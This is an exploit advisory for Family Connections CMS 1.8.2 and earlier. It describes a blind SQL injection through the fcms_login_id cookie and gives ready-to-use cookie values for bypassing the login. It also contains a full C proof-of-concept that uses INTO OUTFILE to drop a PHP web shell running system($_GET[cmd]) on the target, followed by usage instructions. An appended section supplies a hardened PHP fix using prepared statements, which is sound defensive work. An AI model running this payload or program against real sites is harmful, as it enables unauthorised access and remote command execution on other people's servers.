
Family Connections 1.8.2 Blind SQL Injection (Correct Version)







*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com 

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 1 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Blind SQL Injection

[-] File affected: inc/util_inc.php

An SQL injection in the authentication code usually lets an
unauthenticated visitor bypass the login, and that is exactly what
happens here: the fcms_login_id cookie is interpolated straight into
the WHERE clause of the query in isLoggedIn(), so a UNION in that
cookie can supply the single row the function then checks. Because
-1 matches no real id, the row comes entirely from the injected
SELECT list, with 'admin' and 'password' placed in the username and
password columns (22 values, one per column of fcms_users), and
isLoggedIn() compares them against the other two cookies. Setting
the following cookies is enough:

Cookie name: fcms_login_id
Cookie content: -1 UNION ALL SELECT
1,2,3,4,5,6,7,8,9,'admin','password',12,13,14,15,16,17,18,19,20,21,22
Cookie server: localhost (change it)
Cookie path: /

Cookie name: fcms_login_uname
Cookie content: admin
Cookie server: localhost (change it)
Cookie path: /

Cookie name: fcms_login_pw
Cookie content: password
Cookie server: localhost (change it)
Cookie path: /

The values in these cookies are, however, also copied into the
session and reused by other functions and queries, so it is not
possible to browse the site with the bypassed login: the CMS aborts
the session each time one of those queries fails with an SQL error.
Writing the result of the injected query to a file with INTO OUTFILE
is the handy way around this limitation, since a single request is
then enough to drop a PHP file into the web root and the injected
cookie is not needed afterwards. Note that INTO OUTFILE only works
if the database account used by the CMS holds the MySQL FILE
privilege, the mysqld process can write to the target directory,
the target file does not already exist, and secure_file_priv does
not restrict the location.

The following is the vulnerable code:

...

elseif (isset($_COOKIE['fcms_login_id'])) {
	if (isLoggedIn($_COOKIE['fcms_login_id'],
$_COOKIE['fcms_login_uname'], $_COOKIE['fcms_login_pw'])) {
		$_SESSION['login_id'] = $_COOKIE['fcms_login_id'];
		$_SESSION['login_uname'] = $_COOKIE['fcms_login_uname'];
		$_SESSION['login_pw'] = $_COOKIE['fcms_login_pw'];
	}
	
...

in util_inc.php:

function isLoggedIn ($userid, $username, $password) {
	$result = mysql_query("SELECT * FROM `fcms_users` WHERE `id` = $userid LIMIT 1") or die('<h1>Login Error (util.inc.php 275)</h1>' . mysql_error());
	if (mysql_num_rows($result) > 0) {
		$r = mysql_fetch_array($result);
		if ($r['username'] !== $username) { return false; } elseif ($r['password'] !== $password) { return false; } else { return true; }
	} else {
		return false;
	}
}


*************************************************

[+] Code


- [A] Blind SQL Injection

/*

	Family Connection <= 1.8.2 - Remote Command Execution
	
	Proof of Concept - Written by Salvatore "drosophila" Fresta

	The following software will create a file (rce.php) in the
	specified path using Blind SQL Injection bug. To exec remote
	commands, you must open the file using a browser.
	
*/	

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

/* Open a TCP connection to server:port; returns the socket or -1. */
int socket_connect(char *server, int port) {

	int fd;
	struct sockaddr_in sock;
	struct hostent *host;
	
	memset(&sock, 0, sizeof(sock));
	
	if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
	
	sock.sin_family = AF_INET;
	sock.sin_port = htons(port);
	
	if(!(host=gethostbyname(server))) { close(fd); return -1; }
	
	sock.sin_addr = *((struct in_addr *)host->h_addr);
	
	if(connect(fd, (struct sockaddr *) &sock, sizeof(sock)) < 0) { close(fd); return -1; }
	
	return fd;
   
}

int socket_send(int socket, char *buffer, size_t size) {
	
	if(socket < 0) return -1;

	return write(socket, buffer, size) < 0 ? -1 : 0;
	
}

void usage(char *bn) {

	printf("\n\nFamily Connection <= 1.8.2 - Remote Command Execution\n"
			"Proof of Concept - Written by Salvatore \"drosophila\" Fresta\n\n"
			"usage: %s <server> <path> <fs path>\n"
			"example: %s localhost /fcms/ /var/www/htdocs/fcms/\n\n", bn, bn);	

}

int main(int argc, char *argv[]) {
	
	int sd;
	/* PHP web shell written by INTO OUTFILE. Semicolons are sent as %3b
	 * because ';' separates cookies in the header; PHP url-decodes the
	 * cookie value before it reaches the query. */
	char code[] = "'<?php echo \"<pre>\"%3b system($_GET[cmd])%3b echo \"</pre><br><br>\"%3b?>'",
		*buffer; 
	
	if(argc < 4) {
		usage(argv[0]);
		return -1;
	}
	
	/* 216 covers the fixed text of the request, the PHP payload and the NUL. */
	if(!(buffer = (char *)calloc(216+strlen(argv[1])+strlen(argv[2])+strlen(argv[3]), sizeof(char)))) {
		perror("calloc");
		return -1;
	}
	
	/* The UNION row has 22 values (the fcms_users column count); the
	 * trailing '#' comments out the " LIMIT 1" the application appends. */
	sprintf(buffer,	"GET %shome.php HTTP/1.1\r\n"
					"Host: %s\r\n"
					"Cookie: fcms_login_id=-1 UNION ALL SELECT %s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '%srce.php'#\r\n\r\n",
					argv[2], argv[1], code, argv[3]);
					
	printf("\n[*] Connecting...");
	
	if((sd = socket_connect(argv[1], 80)) < 0) {
		perror("[-] Connection failed");
		free(buffer);
		return -1;
	}
	
	printf("\n[+] Connected"
			"\n[*] Sending...");
	
	if(socket_send(sd, buffer, strlen(buffer)) < 0) {
		perror("[-] Sending failed");
		close(sd);
		free(buffer);
		return -1;
	}
	
	printf("\n[+] Sent\n\n"
			"Open your browser and try to connect to http://%s%srce.php?cmd=ls\n\n", argv[1], argv[2]);
				
	/* Wait for the first response byte so the server has processed the request. */
	recv(sd, buffer, 1, 0);
	
	close(sd);
	free(buffer);
	
	printf("[+] Connection closed\n\n");
	
	return 0;
	
}


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351
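The Fix section above is empty, so here is an added example (not the project's code and not a vendor patch) of how isLoggedIn() can be hardened against the cookie injection described in this advisory. It assumes a mysqli connection ($db), the `fcms_users` table with `id`, `username` and `password` columns, and password values that are compared byte-for-byte as the original does; those assumptions are marked in the code.

```php
<?php
// Added example, not Family Connections' code: a hardened isLoggedIn().
// Assumptions (not stated in the advisory): a mysqli connection $db, the table
// `fcms_users` with columns `id`, `username`, `password`, and a stored password
// value that is compared byte-for-byte, as the original code does. If the
// column holds password_hash() output, use password_verify($password, $dbPass)
// in place of the second hash_equals().

function isLoggedIn(mysqli $db, $userid, $username, $password): bool
{
    // The original interpolated $userid into the WHERE clause, which is what
    // lets "-1 UNION ALL SELECT ..." in the cookie supply the row that gets
    // compared. Reject anything that is not a positive integer up front.
    $id = filter_var($userid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false || !is_string($username) || !is_string($password)) {
        return false;
    }

    // A prepared statement binds the id as an integer parameter: the cookie
    // value can no longer alter the SQL text, so a UNION is just a bad id.
    $stmt = $db->prepare('SELECT `username`, `password` FROM `fcms_users` WHERE `id` = ? LIMIT 1');
    if ($stmt === false) {
        // The original die()d with mysql_error(), echoing the failing query
        // back to the client. Log server-side instead and fail closed.
        error_log('isLoggedIn: prepare failed: ' . $db->error);
        return false;
    }
    $stmt->bind_param('i', $id);
    if (!$stmt->execute()) {
        error_log('isLoggedIn: execute failed: ' . $stmt->error);
        $stmt->close();
        return false;
    }
    $stmt->bind_result($dbUser, $dbPass);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return false;
    }

    // hash_equals() compares in constant time, so a wrong username or
    // password does not leak how many leading bytes matched via timing.
    return hash_equals((string) $dbUser, $username)
        && hash_equals((string) $dbPass, $password);
}
```

Binding the id closes the injection and removes the error page that leaked query text, but the surrounding design shown in the advisory is unchanged: the username and password still travel in cookies (fcms_login_uname, fcms_login_pw) and are replayed on every request, so the values this function compares are still attacker-supplied strings rather than a server-side session token.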
